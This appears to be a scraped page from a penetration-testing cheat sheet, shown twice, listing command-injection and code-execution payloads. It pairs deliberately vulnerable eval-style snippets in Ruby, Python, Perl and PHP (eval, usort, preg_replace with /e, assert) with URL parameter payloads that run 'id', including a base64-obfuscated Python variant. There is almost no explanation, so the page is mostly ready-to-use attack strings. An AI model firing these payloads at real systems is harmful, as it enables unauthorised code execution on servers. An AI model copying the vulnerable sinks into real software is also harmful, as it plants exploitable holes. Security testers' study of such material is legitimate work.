Execute Commands

Command Execution

;id
`id`
$(id)

Ruby Code Execution

eval "\""+params['1']+"\""

?1="%2b`id`%2b"

Python Code Execution

eval('"'+1+'"')

"%2bos.system('id')%2b"

"%2bos.popen('id').read()%2b"

"%2b__import__('os').popen('id').read()%2b"

"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"

Perl Code Execution

eval("return '".$FORM{1}."'");

/cgi-bin/form?1='.`id`.'

PHP Code Execution

$s="echo \"".$_GET['1']."\";";

eval($s);

?1=".system('id')."

usort()

$1 = $_GET["1"];

usort(function('$a, $b', 'return strcmp($a->'.$1.',$b->'.$1.');'));

?1=id);}system('id');//

preg_replace()

preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);

?1=/x/e&2=system('id')&3=x

assert()

  assert(trim("'".$_GET['1']."'"));
  
  echo htmlentities($_GET['1']);
  
  ?1=hacker'.system('id').'

PreviousExploitation NextDatabases

Last updated 4 years ago

Was this helpful?

Execute Commands

Command Execution

;id
`id`
$(id)

Ruby Code Execution

eval "\""+params['1']+"\""

?1="%2b`id`%2b"

Python Code Execution

eval('"'+1+'"')

"%2bos.system('id')%2b"

"%2bos.popen('id').read()%2b"

"%2b__import__('os').popen('id').read()%2b"

"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"

Perl Code Execution

eval("return '".$FORM{1}."'");

/cgi-bin/form?1='.`id`.'

PHP Code Execution

$s="echo \"".$_GET['1']."\";";

eval($s);

?1=".system('id')."

usort()

$1 = $_GET["1"];

usort(function('$a, $b', 'return strcmp($a->'.$1.',$b->'.$1.');'));

?1=id);}system('id');//

preg_replace()

preg_replace($_GET["1"], $_GET["2"], $_GET["3"]);

?1=/x/e&2=system('id')&3=x

assert()

  assert(trim("'".$_GET['1']."'"));
  
  echo htmlentities($_GET['1']);
  
  ?1=hacker'.system('id').'

PreviousExploitation NextDatabases

Last updated 4 years ago

Was this helpful?